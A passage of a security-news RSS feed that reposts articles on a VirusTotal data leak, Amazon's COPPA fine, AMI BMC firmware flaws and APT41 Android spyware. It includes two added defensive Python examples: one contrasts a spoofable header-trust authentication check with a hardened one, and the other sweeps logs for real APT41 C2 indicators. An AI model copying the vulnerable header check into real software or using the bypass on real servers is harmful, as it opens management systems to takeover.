	<span style="font-size:14px;">The file also contained information on employees of national authorities in the Netherlands, Taiwan, and the United Kingdom, as well as German government agencies, including the Federal Intelligence Service, the Federal Police, and the Military Counterintelligence Service (MAD).</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Information on dozens of employees at Bundesbank, Deutsche Bahn, Allianz, BMW, Mercedes-Benz, and Deutsche Telekom was also found in the leaked file.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/virustotal-apologizes-for-data-leak-affecting-5-600-customers/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">17238</guid><pubDate>Fri, 21 Jul 2023 19:29:32 +0000</pubDate></item><item><title>Amazon agrees to $25 million fine for Alexa children privacy violations</title><link>https://nsaneforums.com/news/security-privacy-news/amazon-agrees-to-25-million-fine-for-alexa-children-privacy-violations-r17237/</link><description><![CDATA[<p>
	<span style="font-size:14px;">The U.S. Justice Department and the Federal Trade Commission (FTC) announced that Amazon has agreed to pay a $25 million fine to settle alleged children's privacy laws violations related to the company's Alexa voice assistant service.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Amazon has offered Alexa voice-activated products and services targeted at children under 13 years old since May 2018.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">In May 2023, the Federal Trade Commission (FTC) and the U.S. Department of Justice (DOJ) <a href="https://www.bleepingcomputer.com/news/technology/amazon-faces-30-million-fine-over-ring-alexa-privacy-violations/" rel="external nofollow">filed charges against Amazon</a>, accusing the company of violating children's privacy laws, which include the FTC Act, the Children's Online Privacy Protection Act (COPPA), and the COPPA Rule.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The charges were brought after Amazon failed to comply with parents' requests to delete their children's voice recordings and geolocation information.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to the <a href="https://www.ftc.gov/system/files/ftc_gov/pdf/Amazon-Complaint-%28Dkt.1%29.pdf" rel="external nofollow">complaint</a>, Amazon "failed for a significant period of time to honor parents' requests that it delete their children's voice recordings by continuing to retain the transcripts of those recordings and failing to disclose that it was doing so, also in violation of COPPA."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Furthermore, the company should have deleted users' voice information and geolocation data upon request but instead chose to retain that information for its potential use.</span>
</p>

<h2>
	<span style="font-size:14px;">Ring subsidiary also facing a $5 million fine</span>
</h2>

<p>
	<span style="font-size:14px;">Amazon also faces a $5 million fine for privacy violations associated with its Ring video doorbell service.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The fine stems from the alleged actions of employees with Amazon's Ring home security camera subsidiary, who are accused of engaging in unlawful surveillance of customers and failing to adequately prevent hackers from seizing control of users' cameras.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"While we disagree with the FTC's claims regarding both Alexa and Ring, and deny violating the law, these settlements put these matters behind us," Amazon <a href="https://www.bleepingcomputer.com/news/technology/amazon-faces-30-million-fine-over-ring-alexa-privacy-violations/" rel="external nofollow">told BleepingComputer</a> after FTC's complaint was filed in May.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"As part of the settlement, we agreed to make a small modification to our already strong practices, and will remove child profiles that have been inactive for more than 18 months unless a parent or guardian chooses to keep them."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">In March 2023, the FTC fined Fortnite maker Epic Games <a href="https://www.ftc.gov/news-events/news/press-releases/2023/03/ftc-finalizes-order-requiring-fortnite-maker-epic-games-pay-245-million-tricking-users-making" rel="external nofollow">$245 million</a> (down from <a href="https://www.bleepingcomputer.com/news/gaming/epic-games-to-pay-520-million-for-privacy-violations-dark-patterns/" rel="external nofollow">a proposed $520 million penalty</a>) for <a href="https://www.bleepingcomputer.com/news/gaming/epic-games-to-pay-520-million-for-privacy-violations-dark-patterns/" rel="external nofollow">breaching children's privacy laws</a> and employing deceptive tactics, known as dark patterns, to manipulate millions into making unintentional in-game purchases.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">More recently, Microsoft also <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-to-pay-20-million-for-xbox-children-privacy-violations/" rel="external nofollow">reached an agreement to pay a $20 million fine</a> and update its data privacy protocols concerning children.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This resolution came as a settlement for charges brought by the Federal Trade Commission (FTC) pertaining to violations of the Children's Online Privacy Protection Act (COPPA) linked to Microsoft's Xbox Live service.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/technology/amazon-agrees-to-25-million-fine-for-alexa-children-privacy-violations/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">17237</guid><pubDate>Fri, 21 Jul 2023 19:27:42 +0000</pubDate></item><item><title>This large-scale hack could affect millions of servers across the world</title><link>https://nsaneforums.com/news/security-privacy-news/this-large-scale-hack-could-affect-millions-of-servers-across-the-world-r17232/</link><description><![CDATA[<p>
	<span style="font-size:22px;">Two high-severity flaws found in important server firmware</span>
</p>

<p>
	 
</p>

<p>
	Cybersecurity researchers from Eclypsium have discovered two vulnerabilities, one rated critical and one high, in the AMI MegaRAC Baseboard Management Controller (BMC) firmware. 
</p>

<p>
	 
</p>

<p>
	The firmware gives IT teams full access to data center servers, allowing them to reinstall operating systems, manage applications, and administer the machines even when they're powered off. In industry terms, it provides "out-of-band" or "lights-out" remote system management. 
</p>

<p>
	 
</p>

<p>
	The two flaws are tracked as CVE-2023-34329 (authentication bypass via HTTP header spoofing), with a 9.9 severity score, and CVE-2023-34330 (code injection via the Dynamic Redfish Extension interface), with an 8.2 severity score. By chaining them, threat actors could use the Redfish remote management interface to gain remote code execution on vulnerable servers. Given the firmware's popularity, this could mean millions of servers, as it is used by some of the world's largest server manufacturers, which in turn serve high-profile cloud service and data center providers: AMD, Asus, ARM, Dell EMC, Gigabyte, Lenovo, Nvidia, Qualcomm, HPE, Huawei, and more. 
</p>

<p>
	 
</p>

<p>
	The destructive potential is extensive, the researchers said: threat actors could gain access to sensitive data, install ransomware or trojans, or even brick the servers by putting them into an unstoppable, never-ending reboot loop.
</p>

<p>
	 
</p>

<p>
	"We also need to emphasize that such an implant can be extremely hard to detect, and is extremely easy to recreate for any attacker in the form of a one-line exploit," the researchers warned in their writeup.
</p>

<p>
	 
</p>

<p>
	AMI has since released a patch and advised its customers to apply it immediately, as that is the best protection against compromise.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>Analysis: Why does it matter?</strong></span>
</p>

<p>
	<br />
	The flaws matter because of their enormous destructive potential. Since they sit in firmware from a component supplier, they trickle down through many hardware vendors to many cloud service providers, affecting countless organizations. Vulnerabilities like these two amount to the motherlode of supply chain attacks. 
</p>

<p>
	 
</p>

<p>
	It all started roughly two years ago, when the RansomEXX ransomware gang compromised systems belonging to the computer hardware giant GIGABYTE. The crooks stole more than 100 gigabytes of sensitive data, including information belonging to Intel, AMD and, among others, AMI. The data was subsequently leaked on the dark web, where it was picked up by cybersecurity researchers from Eclypsium (as well as others, and possibly many malicious actors). 
</p>

<p>
	 
</p>

<p>
	The researchers uncovered two zero-days that had been lurking in the leaked code for years; chained together, they let an attacker use the Redfish remote management interface to gain remote code execution. Redfish, as Ars Technica explains in its writeup, is the successor to traditional IPMI and offers an API standard for managing server infrastructure and the other infrastructure needed for today's data centers. It's supported by practically all server and infrastructure vendors and by the OpenBMC firmware project. 
</p>

<p>
	 
</p>

<p>
	The flaws are found in the firmware of BMCs (baseboard management controllers), which grant administrators "god mode" over the servers they manage. As per Ars Technica, AMI is the leading provider of BMCs and BMC firmware and serves a wide range of hardware vendors and cloud service providers, including the biggest household names. 
</p>

<p>
	 
</p>

<p>
	The researchers also noted that if they could find the vulnerabilities and write exploits after analyzing the publicly available source code, any malicious actor could do the same. Even without access to the source code, the flaws could still be identified by decompiling BMC firmware images. The good news is that there's still no evidence anyone has done so.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>What have others said about the flaws?</strong></span>
</p>

<p>
	<br />
	For HD Moore, the CTO and co-founder at runZero, it’s now pivotal that potentially affected customers patch their systems immediately: “The attack chain identified by Eclypsium allows a remote attacker to completely and possibly permanently compromise vulnerable MegaRAC BMCs,” he said. “This attack would be 100% reliable and difficult to detect after the fact.”
</p>

<p>
	 
</p>

<p>
	He added that updating the flawed AMI firmware shouldn't be too troublesome if environments have either automated their patching or placed the BMC Ethernet interfaces used for out-of-band administration on a dedicated network. 
</p>

<p>
	 
</p>

<p>
	While Twitter users were generally quiet on the news, a user named Secure ICS OT, which posts about ICS and ICS security, commented: “Laughs in on-premise isolated network,” suggesting that's the best way to stay secure. On Reddit, users were more talkative, with one user downplaying the importance of the findings: “This isn't as bad as it sounds. How many places have their BMC open to the net? If they have access then they are already on your network anyway and you have bigger issues,” they said. 
</p>

<p>
	 
</p>

<p>
	“I would assume most data centers have BMCs, iDRACs, lifecycle controllers, etc on a management VLAN, so they have some level of protection,” another user added. “On the other hand, there’s the 1.8 bajillion small businesses running one Dell T450 on 192.168.1.x.”
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.techradar.com/pro/this-large-scale-hack-could-affect-millions-of-servers-across-the-world" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">17232</guid><pubDate>Fri, 21 Jul 2023 17:32:52 +0000</pubDate></item><item><title>Firmware vulnerabilities in millions of computers could give hackers superuser status</title><link>https://nsaneforums.com/news/security-privacy-news/firmware-vulnerabilities-in-millions-of-computers-could-give-hackers-superuser-status-r17220/</link><description><![CDATA[<h2>
	<span style="font-size:14px;">BMCs give near-total control over entire fleets of servers. What happens when they're hacked?</span>
</h2>

<div>
	<div>
		
			<div>
				<p>
					<span style="font-size:14px;">Two years ago, ransomware crooks breached hardware-maker Gigabyte and dumped more than 112 gigabytes of data that included information from some of its most important supply-chain partners, including Intel and AMD. Now researchers are warning that the leaked information revealed what could amount to critical zero-day vulnerabilities that could imperil huge swaths of the computing world.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">The vulnerabilities reside inside firmware that Duluth, Georgia-based AMI makes for BMCs (baseboard management controllers). These tiny computers soldered into the motherboard of servers allow cloud centers, and sometimes their customers, to streamline the remote management of vast fleets of computers. They enable administrators to remotely reinstall OSes, install and uninstall apps, and control just about every other aspect of the system—even when it's turned off. BMCs provide what’s known in the industry as “lights-out” system management.</span>
				</p>

				<h2>
					<span style="font-size:14px;">Lights-out forever</span>
				</h2>

				<p>
					<span style="font-size:14px;">Researchers from security firm Eclypsium analyzed AMI firmware leaked in the <a href="https://therecord.media/motherboard-vendor-gigabyte-hit-by-ransomexx-ransomware-gang" rel="external nofollow">2021 ransomware attack</a> and identified vulnerabilities that had lurked for years. They can be exploited by any local or remote attacker with access to an industry-standard remote-management interface known as Redfish to execute malicious code that will run on every server inside a data center.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">Until the vulnerabilities are patched using an update AMI published on Thursday, they provide a means for malicious hackers, whether financially motivated or nation-state sponsored, to gain superuser status inside some of the most sensitive cloud environments in the world. From there, the attackers could install ransomware and espionage malware that runs at some of the lowest levels inside infected machines. Successful attackers could also cause physical damage to servers or indefinite reboot loops that a victim organization can’t interrupt. Eclypsium warned such events could lead to “lights out forever” scenarios.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">In a <a href="https://eclypsium.com/research/bmcc-lights-out-forever/" rel="external nofollow">post published Thursday</a>, Eclypsium researchers wrote:</span>
				</p>

				<p>
					 
				</p>

				<blockquote>
					<p>
						<span style="font-size:14px;">These vulnerabilities range in severity from High to Critical, including unauthenticated remote code execution and unauthorized device access with superuser permissions. They can be exploited by remote attackers having access to<a href="https://www.dmtf.org/standards/redfish" rel="external nofollow"> Redfish</a> remote management interfaces, or from a compromised host operating system. Redfish is the successor to traditional IPMI and provides an API standard for the management of a server’s infrastructure and other infrastructure supporting modern data centers. Redfish is supported by virtually all major server and infrastructure vendors, as well as the OpenBMC firmware project often used in modern hyperscale environments.</span>
					</p>

					<p>
						<span style="font-size:14px;">These vulnerabilities pose a major risk to the technology supply chain that underlies cloud computing. In short, vulnerabilities in a component supplier affect many hardware vendors, which in turn can be passed on to many cloud services. As such these vulnerabilities can pose a risk to servers and hardware that an organization owns directly as well as the hardware that supports the cloud services that they use. They can also impact upstream suppliers to organizations and should be discussed with key 3rd parties as part of general supply chain risk management due diligence.</span>
					</p>

					<p>
						<span style="font-size:14px;">BMCs are designed to provide administrators with near total and remote control over the servers they manage. AMI is a leading provider of BMCs and BMC firmware to a wide range of hardware vendors and cloud service providers. As a result, these vulnerabilities affect a very large number of devices, and could enable attackers to gain control of or cause damage not only to devices but to data centers and cloud service infrastructure. The same logic flaws may affect devices in fall-back data centers in different geographic regions part of the same service provider, and can challenge assumptions cloud providers (and their customers) often make in the context of risk management and continuity of operations.</span>
					</p>

					<p>
						 
					</p>
				</blockquote>

				<p>
					<span style="font-size:14px;">The researchers went on to note that if they could locate the vulnerabilities and write exploits after analyzing the publicly available source code, there’s nothing stopping malicious actors from doing the same. And even without access to the source code, the vulnerabilities could still be identified by decompiling BMC firmware images. There's no indication malicious parties have done so, but there's also no way to know they haven't.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">The researchers privately notified AMI of the vulnerabilities, and the company created firmware patches, which are available to customers through a <a href="http://cp.ami.com/" rel="external nofollow">restricted support page</a>. AMI has also published an advisory <a href="https://9443417.fs1.hubspotusercontent-na1.net/hubfs/9443417/Security%20Advisories/AMI-SA-2023006.pdf" rel="external nofollow">here</a>.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">The vulnerabilities are:</span>
				</p>

				<ul>
					<li>
						<span style="font-size:14px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-34329" rel="external nofollow">CVE-2023-34329</a>, an authentication bypass via HTTP headers that has a severity rating of 9.9 out of 10, and</span>
					</li>
					<li>
						<span style="font-size:14px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-34330" rel="external nofollow">CVE-2023-34330</a>, Code injection via Dynamic Redfish Extension. Its severity rating is 8.2.</span>
					</li>
				</ul>
			</div>
		
	</div>
</div>

<div>
	<div>
		
			<div>
				<h2>
					<span style="font-size:14px;">Dire outcomes</span>
				</h2>

				<p>
					<span style="font-size:14px;">There are a variety of post-exploit scenarios that depend on the specific configurations inside vulnerable environments and methods used by parties exploiting the vulnerabilities. The most dire outcome follows when an attacker combines the two vulnerabilities. The researchers wrote:</span>
				</p>

				<p>
					 
				</p>

				<blockquote>
					<p>
						<span style="font-size:14px;">When both of these vulnerabilities are chained together, even a remote attacker with network access to BMC management interface and no BMC credentials, can achieve remote code execution by tricking BMC into believing that the http request is coming from the internal interface. As a result the attacker can remotely upload and execute arbitrary code, possibly from the Internet, if the interface is exposed to it.</span>
					</p>

					<p>
						 
					</p>
				</blockquote>

				<p>
					<span style="font-size:14px;">The Redfish interface allows for two authentication options: “basic auth,” which uses a mechanism supported by some BIOS firmware, and “no auth,” which only verifies that communication is coming from the USB0 network address, also known as the internal host interface. Attackers can exploit CVE-2023-34329, the HTTP header spoofing bug listed above, to pass that check without credentials and, chained with CVE-2023-34330, to execute malicious code.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">“By spoofing certain HTTP headers, an attacker can trick BMC into believing that external communication is coming in from the USB0 internal interface,” the researchers wrote. “When this is combined on a system shipped with the No Auth option configured, the attacker can bypass authentication, and perform Redfish API actions.”</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">One example would be to create an account that poses as a legitimate administrator and has all system rights afforded one.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">CVE-2023-34330, meanwhile, can be exploited on systems with the no auth setting to execute code of the attacker's choice. If the no auth option isn’t enabled, the attackers first need BMC credentials. That’s a higher bar, but by no means out of reach for sophisticated actors.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">The vulnerabilities can be exploited by attackers who gain access to a server's BMC, but also by those with initial access into a data center or administrator network. Where systems are misconfigured to allow direct access, they can also be exploited over the Internet. Yet another possibility is exploiting them after compromising the server's operating system.</span>
				</p>
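				<p>
					<span style="font-size:14px;">The chain Eclypsium describes above, and that the TechRadar piece earlier on this page summarises, comes down to one trust decision: does the BMC decide that a request is "internal" from something the client sends, or from something the client cannot forge? The Python sketch below is an added example written for this page, not code from Eclypsium, AMI or Ars Technica. It models that decision in its spoofable form (a header) and its hardened form (the accepted connection's peer address), and adds the matching log check. The header name X-Interface, the 169.254.0.0/24 range for USB0, the sample account and the request samples are assumptions made for illustration.</span>
				</p>

```python
"""Added illustration (this editor's code, not Eclypsium's, AMI's or Ars
Technica's) of the trust decision behind CVE-2023-34329.  A Redfish service
in "no auth" mode waives credentials for requests it believes arrived over the
internal host interface (USB0).  If that belief rests on an HTTP header, any
client that can reach the management port can claim to be internal; if it
rests on the socket's peer address, it cannot.  The header name, the USB0
address range, the sample account and the request samples are assumptions."""
import ipaddress
from typing import Callable, Dict, Optional, Tuple

# Assumption: the BMC's host-facing USB0 interface uses this link-local range.
INTERNAL_NET = ipaddress.ip_network("169.254.0.0/24")
# Assumption: a hypothetical header the vulnerable check consults.
ORIGIN_HEADER = "X-Interface"
# Constructed sample account; a real BMC would consult a credential store.
VALID_CREDENTIALS = {("admin", "Example-Pass-1")}


class Request:
    """Minimal model of an inbound Redfish HTTP request."""

    def __init__(self, peer_ip: str, headers: Optional[Dict[str, str]] = None,
                 credentials: Optional[Tuple[str, str]] = None) -> None:
        self.peer_ip = peer_ip          # reported by the kernel for the TCP session
        self.headers = headers or {}    # entirely under the client's control
        self.credentials = credentials  # (user, password) or None


def internal_by_header(req: Request) -> bool:
    """Vulnerable pattern: believes the client's own claim about where it came from."""
    return req.headers.get(ORIGIN_HEADER, "").lower() == "usb0"


def internal_by_peer(req: Request) -> bool:
    """Hardened pattern: uses the peer address of the accepted connection.  A remote
    client cannot make an ordinary TCP session appear to originate on USB0."""
    return ipaddress.ip_address(req.peer_ip) in INTERNAL_NET


def authorize(req: Request, no_auth_enabled: bool,
              is_internal: Callable[[Request], bool]) -> bool:
    """Return True if the Redfish request may proceed."""
    if no_auth_enabled and is_internal(req):
        return True                     # trusted in-band path, no credentials needed
    return req.credentials in VALID_CREDENTIALS


def looks_spoofed(req: Request) -> bool:
    """Detection hook for BMC access logs: a request that claims to be internal
    but arrives from outside the USB0 range deserves an alert either way."""
    return internal_by_header(req) and not internal_by_peer(req)


def run_scenarios() -> Dict[str, bool]:
    """Exercise both checks with a credential-less remote attacker (TEST-NET-3
    address) who spoofs the origin header, a genuine in-band request, and an
    administrator supplying real credentials."""
    attacker = Request("203.0.113.7", {ORIGIN_HEADER: "usb0"})
    host_side = Request("169.254.0.17")
    admin = Request("203.0.113.7", credentials=("admin", "Example-Pass-1"))
    return {
        "attacker_vulnerable_noauth": authorize(attacker, True, internal_by_header),
        "attacker_fixed_noauth": authorize(attacker, True, internal_by_peer),
        "attacker_vulnerable_basicauth": authorize(attacker, False, internal_by_header),
        "host_fixed_noauth": authorize(host_side, True, internal_by_peer),
        "admin_fixed_basicauth": authorize(admin, False, internal_by_peer),
        "attacker_flagged": looks_spoofed(attacker),
        "host_flagged": looks_spoofed(host_side),
    }


if __name__ == "__main__":
    for name, allowed in run_scenarios().items():
        print(f"{name:32s} {allowed}")
```

				<p>
					<span style="font-size:14px;">Two caveats the scenarios make visible. With "no auth" switched off the spoofed header buys the attacker nothing, which is why the setting should stay disabled unless the host really needs credential-free in-band access. And the peer-address check is only as strong as the network layout around it: if the management port and the USB0 subnet are reachable from the same untrusted network, the hardened check still passes for anyone who can source traffic from that subnet, which is the reason for the dedicated management network HD Moore recommends below.</span>
				</p>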

				<h2>
					<span style="font-size:14px;">Patch early and often</span>
				</h2>

				<p>
					<span style="font-size:14px;">The update AMI is making available to customers patches five other vulnerabilities credited to security firm Nozomi Labs.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">HD Moore, the CTO and co-founder at runZero and a researcher with experience breaking into data centers through their BMCs, said installing the update is crucial.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">“The attack chain identified by Eclypsium allows a remote attacker to completely and possibly permanently compromise vulnerable MegaRAC BMCs,” he explained. “This attack would be 100 percent reliable and difficult to detect after the fact.”</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">He said that updating the vulnerable AMI firmware won’t be especially onerous if environments have either:</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">1) Configured BMC-enabled ethernets used for out-of-band administration to use a dedicated network, something that’s common for many cloud/hosting providers. BMC interfaces, including Redfish and IPMI, allow remote upgrades.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">2) Put in place automation processes for pushing patches/upgrades through the server operating system itself.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;">Organizations that rely on AMI-powered BMCs to manage their servers should install the updates as soon as possible. These organizations should also familiarize themselves with <a href="https://www.cisa.gov/news-events/directives/binding-operational-directive-23-02" rel="external nofollow">Binding Operational Directive 23-02</a>, issued by the Cybersecurity and Infrastructure Security Agency. The directive is binding on all US federal government agencies and should be considered best practice by all other organizations.</span>
				</p>

				<p>
					 
				</p>

				<p>
					<span style="font-size:14px;"><a href="https://arstechnica.com/security/2023/07/millions-of-servers-inside-data-centers-imperiled-by-flaws-in-ami-bmc-firmware/" rel="external nofollow">Source</a></span>
				</p>
			</div>
		
	</div>
</div>
]]></description><guid isPermaLink="false">17220</guid><pubDate>Fri, 21 Jul 2023 07:09:17 +0000</pubDate></item><item><title>APT41 hackers target Android users with WyrmSpy, DragonEgg spyware</title><link>https://nsaneforums.com/news/security-privacy-news/apt41-hackers-target-android-users-with-wyrmspy-dragonegg-spyware-r17215/</link><description><![CDATA[<p>
	<span style="font-size:14px;">The Chinese state-backed APT41 hacking group is targeting Android devices with two newly discovered spyware strains dubbed WyrmSpy and DragonEgg by Lookout security researchers.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">APT41 is one of the oldest state hacking groups with a history of targeting various industries in the USA, Asia, and Europe.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">They are known for conducting cyber-espionage operations against entities across various industry sectors, including software development, hardware manufacturing, think tanks, telcos, universities, and foreign governments.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The group has been tracked under various names by multiple cybersecurity companies. Kaspersky <a href="https://securelist.com/winnti-more-than-just-a-game/37029/" rel="external nofollow">has been monitoring their activity</a> since 2012 as Winnti to identify the malware employed in their attacks.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Similarly, <a href="https://www.mandiant.com/resources/blog/apt41-dual-espionage-and-cyber-crime-operation" rel="external nofollow">Mandiant has also been tracking them</a> since 2014 and noticed their activities overlapped with other known Chinese hacking groups like BARIUM.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The U.S. Department of Justice <a href="https://www.bleepingcomputer.com/news/security/us-charges-chinese-winnti-hackers-for-attacking-100-plus-companies/" rel="external nofollow">charged five Chinese nationals linked to APT41</a> in September 2020 for their involvement in cyberattacks on more than 100 companies.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Unlike many nation-state-backed APT groups, APT41 has a track record of compromising both government organizations for espionage, as well as different private enterprises for financial gain," <a href="https://www.lookout.com/threat-intelligence/article/wyrmspy-dragonegg-surveillanceware-apt41" rel="external nofollow">Lookout said</a> in a report published this week.</span>
</p>

<h2>
	<span style="font-size:14px;">The Android spyware link</span>
</h2>

<p>
	<span style="font-size:14px;">While APT41 hackers usually breach their targets' networks via vulnerable web apps and Internet-exposed endpoints, Lookout says the group also targets Android devices with WyrmSpy and DragonEgg spyware strains.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Lookout first identified WyrmSpy in 2017 and DragonEgg in early 2021; the most recent sample it found dates from April 2023.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Both Android malware strains come with extensive data collection and exfiltration capabilities activated on compromised Android devices after deploying secondary payloads.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">While WyrmSpy disguises itself as a default operating system app, DragonEgg is camouflaged as a third-party keyboard or messaging app, using these guises to evade detection.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The two malware strains also share overlapping Android signing certificates, strengthening their connection to a single threat actor.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Lookout discovered the link to APT41 after finding a command-and-control (C2) server at the IP address 121.42.149[.]52, which resolved to the vpn2.umisen[.]com domain and was hard-coded into the malware's source code.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The server was part of APT41's attack infrastructure between May 2014 and August 2020, as revealed in the U.S. Department of Justice's <a href="https://www.justice.gov/d9/press-releases/attachments/2020/09/16/c404_indictment_0.pdf" rel="external nofollow">September 2020 indictment</a>.</span>
</p>
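<p>
	<span style="font-size:14px;">One practical use of the two indicators above, as an added example rather than part of the Lookout report or BleepingComputer's article: refang the defanged values and sweep DNS and proxy logs for them, matching the IP only as a whole token and the domain together with any of its subdomains. The log lines and their field layout are constructed for the example.</span>
</p>

```python
"""Refang the C2 indicators quoted above and sweep log lines for them.

Added example for this page, not code from Lookout. The two indicators are
the ones named in the article; the log lines are constructed samples and
their format (a DNS query log and a proxy log) is an assumption.
"""
import ipaddress
import re
from typing import List, Tuple

DEFANGED_IOCS = ["121.42.149[.]52", "vpn2.umisen[.]com"]

# Anything that can be a hostname or dotted IP inside a log line.
HOST_TOKEN = re.compile(r"[A-Za-z0-9.\-]+")


def refang(ioc: str) -> str:
    """Undo the usual '[.]' / '(.)' / 'hxxp' defanging so the value can be matched literally."""
    return re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", ioc).replace("hxxp", "http").lower()


def is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def matches(line: str, iocs: List[str]) -> List[str]:
    """Indicators present in one log line.

    An IP must appear as a whole token, so 121.42.149.5 does not match .52;
    a domain matches itself and any subdomain (api.vpn2.umisen.com), but not
    a look-alike that merely contains it (umisen.com.example.org).
    """
    hits = []
    tokens = {t.lower().rstrip(".") for t in HOST_TOKEN.findall(line)}
    for ioc in iocs:
        if is_ip(ioc):
            if ioc in tokens:
                hits.append(ioc)
        elif any(t == ioc or t.endswith("." + ioc) for t in tokens):
            hits.append(ioc)
    return hits


def sweep(lines: List[str], defanged: List[str] = DEFANGED_IOCS) -> List[Tuple[int, str, str]]:
    """(line number, indicator, line) for every hit across the given log lines."""
    iocs = [refang(i) for i in defanged]
    found = []
    for n, line in enumerate(lines, 1):
        for ioc in matches(line, iocs):
            found.append((n, ioc, line.strip()))
    return found


# Constructed sample log, not real traffic.
SAMPLE_LOG = [
    "2023-07-20T09:12:01Z dns client=10.0.5.23 query=vpn2.umisen.com type=A",
    "2023-07-20T09:12:02Z proxy client=10.0.5.23 dst=121.42.149.52:443 method=CONNECT",
    "2023-07-20T09:13:44Z proxy client=10.0.5.31 dst=121.42.149.5:443 method=CONNECT",
    "2023-07-20T09:15:10Z dns client=10.0.5.40 query=umisen.com.example.org type=A",
    "2023-07-20T09:16:00Z dns client=10.0.5.40 query=api.vpn2.umisen.com type=A",
]

if __name__ == "__main__":
    for n, ioc, line in sweep(SAMPLE_LOG):
        print(f"line {n}: {ioc} <- {line}")
```

<p>
	<span style="font-size:14px;">Lines 1, 2 and 5 of the sample are hits; line 3 (a neighbouring IP) and line 4 (a domain that only contains the string) are not, which is the distinction a naive substring grep gets wrong. Since the server was last tied to APT41 infrastructure in 2020, a hit in current logs is a lead to investigate, not proof of an active infection.</span>
</p>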

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Lookout researchers have not yet encountered samples in the wild and assess with moderate confidence that they are distributed to victims through social engineering campaigns. Google confirmed that based on current detection, no apps containing this malware are found to be on Google Play," Lookout said.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">However, APT41's interest in Android devices "shows that mobile endpoints are high-value targets with coveted data."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/apt41-hackers-target-android-users-with-wyrmspy-dragonegg-spyware/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">17215</guid><pubDate>Fri, 21 Jul 2023 06:53:15 +0000</pubDate></item><item><title>GitHub warns of Lazarus hackers targeting devs with malicious projects</title><link>https://nsaneforums.com/news/security-privacy-news/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects-r17206/</link><description><![CDATA[<p>
	GitHub is warning of a social engineering campaign targeting the accounts of developers in the blockchain, cryptocurrency, online gambling, and cybersecurity sectors to infect their devices with malware.
</p>

<p>
	 
</p>

<p>
	The campaign was linked to the North Korean state-sponsored Lazarus hacking group, also known as Jade Sleet (Microsoft Threat Intelligence) and TraderTraitor (CISA). The <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-108a" rel="external nofollow" target="_blank">US government released a report</a> in 2022 detailing the threat actors' tactics.
</p>

<p>
	 
</p>

<p>
	The hacking group has a long history of targeting cryptocurrency companies and cybersecurity researchers for cyberespionage and to steal cryptocurrency.
</p>

<h2>
	Targeting developers with malware
</h2>

<p>
